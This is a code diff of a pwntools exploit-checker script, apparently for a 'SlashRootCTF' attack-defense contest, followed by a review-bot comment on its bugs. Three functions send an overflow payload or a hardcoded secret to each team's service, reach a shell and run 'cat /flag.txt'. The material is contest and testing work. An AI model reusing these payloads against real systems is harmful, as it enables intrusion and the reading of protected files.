|
@ -6,99 +6,95 @@ TOTAL_TEAMS = 1 |
|
|
FORMAT = "SlashRootCTF" |
|
|
FORMAT = "SlashRootCTF" |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def run(): |
|
|
|
|
|
# return process(FILENAME) |
|
|
|
|
|
return remote("127.0.0.1", 60204) |
|
|
|
|
|
|
|
|
def poc0(host, port): |
|
|
|
|
|
with remote(host, port) as p: |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01")) |
|
|
|
|
|
msg = p.recvuntil(">") |
|
|
|
|
|
# print(msg) |
|
|
|
|
|
if "young" in msg: |
|
|
|
|
|
p.sendline("y") |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("2") |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("4") |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("y") |
|
|
|
|
|
for _ in xrange(10): |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("99") |
|
|
|
|
|
p.sendline("cat /flag.txt") |
|
|
|
|
|
flag = p.recvuntil("}") |
|
|
|
|
|
# print flag |
|
|
|
|
|
if FORMAT in flag: |
|
|
|
|
|
return True |
|
|
|
|
|
else: |
|
|
|
|
|
return False |
|
|
|
|
|
else: |
|
|
|
|
|
return False |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def poc0(host, port): |
|
|
|
|
|
p = remote(host, port) |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01")) |
|
|
|
|
|
msg = p.recvuntil(">") |
|
|
|
|
|
# print(msg) |
|
|
|
|
|
if "young" in msg: |
|
|
|
|
|
p.sendline("y") |
|
|
|
|
|
|
|
|
def poc1(host, port): |
|
|
|
|
|
with remote(host, port) as p: |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("2") |
|
|
|
|
|
|
|
|
p.sendline("Leo") |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("y") |
|
|
|
|
|
for _ in range(2): |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("3") |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("0") |
|
|
|
|
|
if "Who" in p.recvuntil(">"): |
|
|
|
|
|
return False |
|
|
|
|
|
p.sendline("y") |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("1") |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("4") |
|
|
p.sendline("4") |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("y") |
|
|
p.sendline("y") |
|
|
for _ in xrange(10): |
|
|
|
|
|
|
|
|
for _ in range(10): |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("99") |
|
|
p.sendline("99") |
|
|
p.sendline("cat /flag.txt") |
|
|
p.sendline("cat /flag.txt") |
|
|
flag = p.recvuntil("}") |
|
|
flag = p.recvuntil("}") |
|
|
# print flag |
|
|
|
|
|
if FORMAT in flag: |
|
|
if FORMAT in flag: |
|
|
return True |
|
|
return True |
|
|
else: |
|
|
else: |
|
|
return False |
|
|
return False |
|
|
else: |
|
|
|
|
|
return False |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def poc1(host, port): |
|
|
|
|
|
p = remote(host, port) |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("Leo") |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("y") |
|
|
|
|
|
for _ in range(2): |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("3") |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("0") |
|
|
|
|
|
if "Who" in p.recvuntil(">"): |
|
|
|
|
|
return False |
|
|
|
|
|
p.sendline("y") |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("1") |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("4") |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("y") |
|
|
|
|
|
for _ in range(10): |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("99") |
|
|
|
|
|
p.sendline("cat /flag.txt") |
|
|
|
|
|
flag = p.recvuntil("}") |
|
|
|
|
|
if FORMAT in flag: |
|
|
|
|
|
return True |
|
|
|
|
|
else: |
|
|
|
|
|
return False |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def poc2(host, port): |
|
|
def poc2(host, port): |
|
|
p = remote(host, port) |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("__th3_w0rLd_D3str0Y3r_15_b4ck__") |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("y") |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("6") |
|
|
|
|
|
if "Lv: 1000000" in p.recvuntil(">"): |
|
|
|
|
|
p.sendline("2") |
|
|
|
|
|
|
|
|
with remote(host, port) as p: |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("4") |
|
|
|
|
|
|
|
|
p.sendline("__th3_w0rLd_D3str0Y3r_15_b4ck__") |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("y") |
|
|
p.sendline("y") |
|
|
for _ in xrange(10): |
|
|
|
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("6") |
|
|
|
|
|
if "Lv: 1000000" in p.recvuntil(">"): |
|
|
|
|
|
p.sendline("2") |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("99") |
|
|
|
|
|
p.sendline("cat /flag.txt") |
|
|
|
|
|
flag = p.recvuntil("}") |
|
|
|
|
|
if FORMAT in flag: |
|
|
|
|
|
return True |
|
|
|
|
|
|
|
|
p.sendline("4") |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("y") |
|
|
|
|
|
for _ in xrange(10): |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("99") |
|
|
|
|
|
p.sendline("cat /flag.txt") |
|
|
|
|
|
flag = p.recvuntil("}") |
|
|
|
|
|
if FORMAT in flag: |
|
|
|
|
|
return True |
|
|
|
|
|
else: |
|
|
|
|
|
return False |
|
|
else: |
|
|
else: |
|
|
return False |
|
|
return False |
|
|
else: |
|
|
|
|
|
return False |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
if __name__ == "__main__": |
|
|
if __name__ == "__main__": |
|
|
for i in range(1, TOTAL_TEAMS+1): |
|
|
for i in range(1, TOTAL_TEAMS+1): |
|
|
print poc0(HOST, (60004 + (i*100))) |
|
|
|
|
|
print poc1(HOST, (60004 + (i*100))) |
|
|
|
|
|
print poc2(HOST, (60004 + (i*100))) |
|
|
|
|
|
|
|
|
r0 = poc0(HOST, (60004 + (i*100))) |
|
|
|
|
|
r1 = poc1(HOST, (60004 + (i*100))) |
|
|
|
|
|
r2 = poc2(HOST, (60004 + (i*100))) |
|
|
|
|
|
print("Team [{}] {} {} {}" % (i, r0, r1, r2)) |
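Review bot: The final `print("Team [{}] {} {} {}" % (i, r0, r1, r2))` mixes `str.format` placeholders with the `%` operator, so it raises `TypeError: not all arguments converted during string formatting` on the first team instead of printing the results; it should be `print("Team [{}] {} {} {}".format(i, r0, r1, r2))`. The old and new sides are not marked in this rendering, but if the `p = remote(host, port)` variants of poc0/poc1/poc2 are the new side, dropping `with remote(host, port) as p:` means every `return` leaves the connection open, so keep the context manager or close `p` in a `finally`. If the `xrange`/`print`-statement changes are a Python 3 port and `remote` is the pwntools tube, `recvuntil` returns bytes there, so `"young" in msg` and `FORMAT in flag` would raise `TypeError` unless the operands are bytes (for example `FORMAT.encode() in flag`); this is worth confirming. None of the `recvuntil` calls passes a timeout, so one unresponsive service stalls the whole per-team loop.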